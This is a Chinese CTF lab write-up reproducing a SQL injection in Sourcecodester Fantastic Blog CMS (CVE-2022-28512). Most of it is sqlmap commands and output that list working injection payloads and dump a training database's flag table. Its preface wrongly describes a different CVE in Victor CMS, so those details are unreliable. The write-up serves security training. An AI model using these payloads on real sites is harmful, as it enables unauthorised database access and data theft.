Sourcecodester Fantastic Blog CMS v1.0 SQL 注入(CVE-2022-28512)

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
云数据库 RDS MySQL,高可用系列 2核4GB
简介: Sourcecodester Fantastic Blog CMS v1.0 SQL 注入(CVE-2022-28512)

前言

CVE-2022-28060 是 Victor CMS v1.0 中的一个SQL注入。该存在于 /includes/login.php 文件中的 user_name 参数。可以通过发送特制的 SQL 语句,利用这个执行未授权的数据库操作,从而访问或修改数据库中的敏感信息。

详细信息

  • 类型:SQL注入
  • 受影响的组件:Victor CMS v1.0
  • 途径:远程攻击者可以利用该,通过发送特制的请求来执行任意的 SQL 语句。
  • 严重性:高 (CVSS v3 基础分数:7.5)

解决方案

  • 使用准备好的语句:采用预编译的 SQL 语句或参数化查询来处理 SQL 请求。
  • 输入验证:对所有用户输入进行严格的验证和过滤,确保只接受符合预期格式的输入。
  • 最小权限原则:为数据库用户分配最低的权限,确保即使发生注入,也无法获得过多的权限

春秋云镜是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:


实战演练:


提供各种网络安全攻防演练场景,模拟真实的网络事件,帮助用户在实际操作中掌握网络安全技术。

场景涵盖Web安全、系统安全、网络安全、社工等多个领域。


复现:


用户可以通过平台对已知的安全进行复现,了解的产生原因、利用方法和修复措施。

通过实战操作,帮助用户掌握利用和防护的技能。


教学培训:


提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。

包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。


竞赛与评测:


定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。


资源共享:


平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。

用户可以在社区中分享经验和资源,互相交流和学习。


春秋云镜适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Sourcecodester Fantastic Blog CMS v1.0 是一个内容管理系统,用于创建和管理博客网站。该系统使用 PHP、MySQL、JavaScript 和 HTML/CSS 构建,旨在提供一个简单且用户友好的博客平台。它主要功能包括用户管理、文章管理和评论管理等。

功能特色

  1. 用户管理:管理员可以创建和管理用户账户,赋予不同的权限,如管理员和普通用户。
  2. 文章管理:用户可以创建、编辑和删除博客文章,包括设置文章的标题、内容和标签等。
  3. 评论管理:用户可以在文章下发表评论,管理员可以审核和管理这些评论,防止垃圾评论的出现。
  4. 多媒体管理:支持上传和管理图片、视频等多媒体文件,以丰富博客内容。
  5. 分类和标签:支持对文章进行分类和添加标签,方便内容的组织和检索。

安装和使用

  1. 服务器要求:需要一个支持 PHP 和 MySQL 的服务器环境,如 XAMPP 或 WAMP。
  2. 数据库配置:下载源码后,配置数据库连接信息,并导入初始数据库文件。
  3. 用户界面:通过简单的界面,用户可以方便地发布和管理博客内容,浏览者可以轻松地阅读和评论文章。

该系统适合个人博客和小型网站的搭建,提供了基础的博客功能,同时源码开放,用户可以根据需要进行二次开发和定制 (SourceCodester) (SourceCodester) (SourceCodester)。

复现

打开

根据题目手动构造 URL

http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1

原首页可以看到是有登录的

现在咱们能直接构造 URL 访问目标页面说明没有用户验证,直接上 SQLMap 跑它

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch --dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:24:55 /2024-06-29/
 
[20:24:55] [INFO] testing connection to the target URL
[20:24:55] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:24:55] [INFO] testing if the target URL content is stable
[20:24:56] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[20:24:56] [INFO] testing if GET parameter 'id' is dynamic
[20:24:56] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:24:56] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:24:56] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:24:56] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:24:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:24:57] [WARNING] reflective value(s) found and filtering out
[20:24:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:24:57] [INFO] testing 'Generic inline queries'
[20:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:25:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:25:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:25:09] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:25:12] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[20:25:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:25:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:25:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:25:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:25:12] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[20:25:12] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[20:25:12] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:25:13] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:25:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:25:13] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[20:25:13] [INFO] testing 'MySQL inline queries'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:25:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[20:25:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:25:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:25:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:25:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:25:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:25:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:25:24] [INFO] target URL appears to have 9 columns in query
[20:25:25] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 260 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYW
 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlP
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYY
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:25:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:25:25] [INFO] fetching database names
[20:25:26] [INFO] retrieved: 'information_schema'
[20:25:26] [INFO] retrieved: 'performance_schema'
[20:25:26] [INFO] retrieved: 'mysql'
[20:25:26] [INFO] retrieved: 'ctf'
available databases [4]:                                                       
[*] ctf
[*] information_schema
[*] mysql
[*] performance_schema
 
[20:25:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'
 
[*] ending @ 20:25:26 /2024-06-29/
 
                                                                                                                                    
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch -D "ctf" --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:26:21 /2024-06-29/
 
[20:26:21] [INFO] resuming back-end DBMS 'mysql' 
[20:26:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYW
 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlP
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYY
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:26:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:26:22] [INFO] fetching tables for database: 'ctf'
[20:26:22] [INFO] retrieved: 'titles'
[20:26:22] [INFO] retrieved: 'page_hits'
[20:26:22] [INFO] retrieved: 'membership_userpermissions'
[20:26:22] [INFO] retrieved: 'membership_groups'
[20:26:23] [INFO] retrieved: 'blog_categories'
[20:26:23] [INFO] retrieved: 'membership_userrecords'
[20:26:23] [INFO] retrieved: 'membership_users'
[20:26:23] [INFO] retrieved: 'editors_choice'
[20:26:23] [INFO] retrieved: 'blogs'
[20:26:23] [INFO] retrieved: 'links'
[20:26:23] [INFO] retrieved: 'flag'
[20:26:23] [INFO] retrieved: 'banner_posts'
[20:26:23] [INFO] retrieved: 'membership_grouppermissions'
[20:26:23] [INFO] retrieved: 'visitor_info'
Database: ctf                                                                                                                      
[14 tables]
+-----------------------------+
| banner_posts                |
| blog_categories             |
| blogs                       |
| editors_choice              |
| flag                        |
| links                       |
| membership_grouppermissions |
| membership_groups           |
| membership_userpermissions  |
| membership_userrecords      |
| membership_users            |
| page_hits                   |
| titles                      |
| visitor_info                |
+-----------------------------+
 
[20:26:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'
 
[*] ending @ 20:26:23 /2024-06-29/
 
                                                                                                                                    
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch -D "ctf" -T "flag" --columns
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:26:39 /2024-06-29/
 
[20:26:39] [INFO] resuming back-end DBMS 'mysql' 
[20:26:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYW
 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlP
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYY
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:26:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:26:40] [INFO] fetching columns for table 'flag' in database 'ctf'
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| flag   | varchar(1024) |
+--------+---------------+
 
[20:26:40] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'
 
[*] ending @ 20:26:40 /2024-06-29/
 
                                                                                                                                    
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch -D "ctf" -T "flag" -C "flag" --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:27:13 /2024-06-29/
 
[20:27:13] [INFO] resuming back-end DBMS 'mysql' 
[20:27:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYW
 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlP
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYY
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:27:13] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:27:13] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{ab5bd2f1-096b-4ed8-928a-59056341e86b} |
+--------------------------------------------+
 
[20:27:14] [INFO] table 'ctf.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[20:27:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'
 
[*] ending @ 20:27:14 /2024-06-29/
 


相关实践学习
基于ACK Serverless轻松部署企业级Stable Diffusion
本实验指导您在容器服务Serverless版(以下简称 ACK Serverless )中,通过Knative部署满足企业级弹性需求的Stable Diffusion服务。同时通过对该服务进行压测实验,体验ACK Serverless 弹性能力。
Kubernetes极速入门
Kubernetes(K8S)是Google在2014年发布的一个开源项目,用于自动化容器化应用程序的部署、扩展和管理。Kubernetes通常结合docker容器工作,并且整合多个运行着docker容器的主机集群。 本课程从Kubernetes的简介、功能、架构,集群的概念、工具及部署等各个方面进行了详细的讲解及展示,通过对本课程的学习,可以对Kubernetes有一个较为全面的认识,并初步掌握Kubernetes相关的安装部署及使用技巧。本课程由黑马程序员提供。 &nbsp; 相关的阿里云产品:容器服务 ACK 容器服务 Kubernetes 版(简称 ACK)提供高性能可伸缩的容器应用管理能力,支持企业级容器化应用的全生命周期管理。整合阿里云虚拟化、存储、网络和安全能力,打造云端最佳容器化应用运行环境。 了解产品详情:&nbsp;https://www.aliyun.com/product/kubernetes
相关文章
|
3月前
|
SQL 安全 前端开发
SourceCodester v1.0 SQL 注入(CVE-2023-2130)
SourceCodester v1.0 SQL 注入(CVE-2023-2130)
SourceCodester v1.0 SQL 注入(CVE-2023-2130)
|
4月前
|
SQL 安全 网络安全
Victor CMS v1.0 SQL 注入(CVE-2022-26201)
Victor CMS v1.0 SQL 注入(CVE-2022-26201)
|
4月前
|
SQL 自然语言处理 安全
Atom CMS v2.0 SQL 注入(CVE-2022-24223)
Atom CMS v2.0 SQL 注入(CVE-2022-24223)
|
4月前
|
SQL 安全 网络安全
Victor CMS v1.0 SQL 注入(CVE-2022-28060)
Victor CMS v1.0 SQL 注入(CVE-2022-28060)
Victor CMS v1.0 SQL 注入(CVE-2022-28060)
|
4月前
|
SQL 安全 关系型数据库
Atom CMS v2.0 SQL 注入(CVE-2022-25488)
Atom CMS v2.0 SQL 注入(CVE-2022-25488)
|
SQL 安全 数据可视化
齐博cms最新SQL注入网站漏洞 可远程执行代码提权
齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用。
659 0
齐博cms最新SQL注入网站漏洞 可远程执行代码提权